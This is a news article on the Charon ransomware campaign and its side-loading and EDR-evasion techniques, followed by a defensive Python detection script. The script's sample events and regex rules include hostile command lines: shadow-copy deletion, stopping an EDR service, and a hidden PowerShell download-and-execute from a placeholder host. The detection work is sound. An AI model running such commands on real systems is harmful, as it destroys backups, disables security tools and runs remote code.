Charon Ransomware Targets Middle East using APT Techniques
Cybersecurity researchers have identified a new ransomware family called Charon, actively targeting the Middle East public sector and aviation industry. According to Trend Micro, the threat actor behind this campaign uses advanced persistent threat (APT) techniques to bypass detection and maximise damage.
How does the Charon Ransomware Attack work?
The attackers employ DLL side-loading, process injection, and endpoint detection and response (EDR) evasion. These tactics are commonly associated with nation-state cyber operations.
Researchers found similarities to Earth Baxia, a China-linked hacking group. Earth Baxia previously targeted government organisations in Taiwan and the Asia-Pacific with the EAGLEDOOR backdoor.
In this case, the attackers exploited a GeoServer security flaw to side-load a malicious DLL and deploy the Charon ransomware payload. The attack chain began with a legitimate browser file (Edge.exe) renamed from cookie_exporter.exe. This file side-loaded a malicious DLL (msedge.dll, known as SWORDLDR), which delivered the Charon ransomware.
Like other ransomware, Charon:
- Terminates security services and processes
- Deletes backups and shadow copies
- Uses multithreading and partial encryption for faster attacks
Charon Uses Dark-Kill Driver and BYOVD Attack
A notable feature of Charon ransomware is its use of a driver from the Dark-Kill open-source project. This enables a bring-your-own-vulnerable-driver (BYOVD) attack, designed to disable EDR solutions. However, researchers noted that this function was not triggered during execution and suggest it is still under development.
Targeted Campaign With Custom Ransom Notes
Evidence suggests this campaign was targeted, not opportunistic. The attackers delivered custom ransom notes, calling out victim organisations by name, a tactic rarely seen in traditional ransomware operations. At present, researchers do not know how the attackers gained initial access.
Is there a confirmed link to Earth Baxia?
The technical overlaps with Earth Baxia leave three possible explanations:
- Direct involvement by Earth Baxia
- A false flag operation imitating Earth Baxia tactics
- A new actor developing similar methods
Trend Micro emphasised that the convergence with Earth Baxia’s previous operations is limited but notable, and that there is no confirmed link.
Rising Convergence of Ransomware and APT Tactics
This attack highlights a disturbing trend: ransomware groups adopting nation-state tradecraft. By combining APT-style evasion techniques with ransomware encryption, attackers create an elevated risk for businesses. The findings stress the need for robust monitoring, EDR solutions, and employee awareness to prevent ransomware infections.
Interlock Ransomware Adds to the Threat
Around the same time, eSentire detailed a campaign by the Interlock ransomware group.
This attack used ClickFix lures, deploying:
- PHP backdoors
- NodeSnake (Interlock RAT) for credential theft
- C-based implants for reconnaissance and ransomware delivery
Researchers highlighted the importance of monitoring PowerShell scripts, LOLBins, and suspicious process activity to detect such campaigns.
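As an added example (not code from Trend Micro, eSentire or either campaign's report), the Python below runs simple triage heuristics over Sysmon-style process-creation events to surface the behaviours this article describes: a legitimate binary running under a different name (the Edge.exe/cookie_exporter.exe side-loading setup), shadow-copy and backup destruction, security-service termination, and the encoded or downloading PowerShell and LOLBin activity eSentire recommends monitoring. Field names mirror Sysmon Event ID 1 (Image, OriginalFileName, CommandLine, ParentImage); the sample events, the service name ExampleEdrAgent, the example.invalid URLs, the trusted-directory list and the Run-dialog heuristic are all constructed assumptions for this example.

```python
"""Heuristic triage of Windows process-creation events (Sysmon Event ID 1 style).

Added example: flags the behaviours described in the article (renamed legitimate
binary, shadow-copy/backup destruction, service termination) plus the PowerShell
and LOLBin activity eSentire recommends monitoring. All sample events below are
constructed for this example and are not indicators from either report.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    event_id: int
    image: str               # Image: full path of the new process
    original_file_name: str  # OriginalFileName: name compiled into the PE version info
    command_line: str        # CommandLine
    parent_image: str        # ParentImage


# Directories where a renamed/side-loaded binary is least expected (assumption).
TRUSTED_DIRS = ("c:\\program files", "c:\\windows")
# Interpreters a ClickFix lure would have the user paste a command into (assumption).
RUN_DIALOG_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line patterns, matched case-insensitively. They correspond to MITRE ATT&CK
# T1490 (Inhibit System Recovery), T1489 (Service Stop), T1059.001 and T1218.
RULES = {
    "shadow_copy_or_backup_destruction": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows"
        r"|wmic(\.exe)?\s+shadowcopy\s+delete"
        r"|wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup)"
        r"|bcdedit(\.exe)?\s+.*recoveryenabled\s+no", re.I),
    "security_service_termination": re.compile(
        r"\b(net1?|sc)(\.exe)?\s+(stop|delete|config)\b"
        r"|taskkill(\.exe)?\s+.*(/f|/im)\b", re.I),
    "suspicious_powershell": re.compile(
        r"powershell(\.exe)?.*?("
        r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
        r"|frombase64string|-nop\b|-w(indowstyle)?\s+hidden"
        r"|-ep\s+bypass|executionpolicy\s+bypass"
        r"|downloadstring|invoke-webrequest|\biwr\b|\birm\b)", re.I),
    "lolbin_remote_fetch": re.compile(
        r"\b(mshta|rundll32|regsvr32|certutil|bitsadmin|msiexec)(\.exe)?\b"
        r".*(https?://|\\\\)", re.I),
}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def renamed_binary(ev: ProcessEvent) -> bool:
    """Name on disk differs from the name compiled into the executable: the
    classic setup for DLL side-loading through a renamed, signed host binary."""
    return bool(ev.original_file_name) and basename(ev.image) != ev.original_file_name.lower()


def clickfix_like(ev: ProcessEvent) -> bool:
    """explorer.exe directly launching an interpreter with a URL on its command
    line is consistent with a command pasted into the Run dialog (heuristic)."""
    return (basename(ev.parent_image) == "explorer.exe"
            and basename(ev.image) in RUN_DIALOG_CHILDREN
            and "http" in ev.command_line.lower())


def triage(events):
    """Return (event_id, rule_name) pairs for every rule each event trips."""
    findings = []
    for ev in events:
        hits = [name for name, rx in RULES.items() if rx.search(ev.command_line)]
        if renamed_binary(ev):
            hits.append("renamed_legitimate_binary")
            if not ev.image.lower().startswith(TRUSTED_DIRS):
                hits.append("binary_outside_trusted_dirs")
        if clickfix_like(ev):
            hits.append("clickfix_like_run_dialog_launch")
        findings.extend((ev.event_id, h) for h in hits)
    return findings


SAMPLE_EVENTS = [  # constructed events mirroring the behaviours described in the article
    ProcessEvent(1, r"C:\Users\Public\Libraries\cookie_exporter.exe", "Edge.exe",
                 r"C:\Users\Public\Libraries\cookie_exporter.exe", r"C:\Windows\explorer.exe"),
    ProcessEvent(2, r"C:\Windows\System32\vssadmin.exe", "VSSADMIN.EXE",
                 "vssadmin.exe delete shadows /all /quiet",
                 r"C:\Users\Public\Libraries\cookie_exporter.exe"),
    ProcessEvent(3, r"C:\Windows\System32\net.exe", "net.exe",
                 "net stop ExampleEdrAgent /y", r"C:\Users\Public\Libraries\cookie_exporter.exe"),
    ProcessEvent(4, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
                 'powershell -nop -w hidden -ep bypass -c "iwr http://example.invalid/x | iex"',
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(5, r"C:\Windows\System32\mshta.exe", "MSHTA.EXE",
                 "mshta https://example.invalid/lure.hta", r"C:\Windows\explorer.exe"),
    ProcessEvent(6, r"C:\Program Files\Microsoft\Edge\Application\msedge.exe", "msedge.exe",
                 r'"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default',
                 r"C:\Windows\explorer.exe"),  # benign control: no findings expected
]

if __name__ == "__main__":
    for event_id, rule in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The renamed-binary check is the one most specific to the side-loading chain described above: it needs no signature of the malicious DLL, only the mismatch between the filename on disk and the OriginalFileName that Sysmon extracts from the signed host executable. The regex rules are deliberately broad and will produce false positives from administrators (for example `net stop` during maintenance), so in practice they belong in a correlation rule keyed on parent process and path rather than in an alert on their own.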
The Growing Impact of Ransomware
Ransomware attacks remain a global cybersecurity crisis.
Key statistics from Barracuda show:
- 57% of organisations suffered a successful ransomware attack in the past year
- 71% of email breach victims were also hit by ransomware
- 32% of victims paid a ransom, but only 41% fully recovered their data
This data underscores the importance of proactive cybersecurity, incident response planning, and employee training.
What does this Charon Ransomware case mean for the Middle East?
The emergence of Charon ransomware in the Middle East highlights the evolving nature of cybercrime. Attackers are increasingly blurring the lines between cybercrime syndicates and nation-state actors.
Organisations in critical sectors must strengthen defences, invest in threat intelligence, and prepare for sophisticated ransomware attacks that go beyond traditional methods.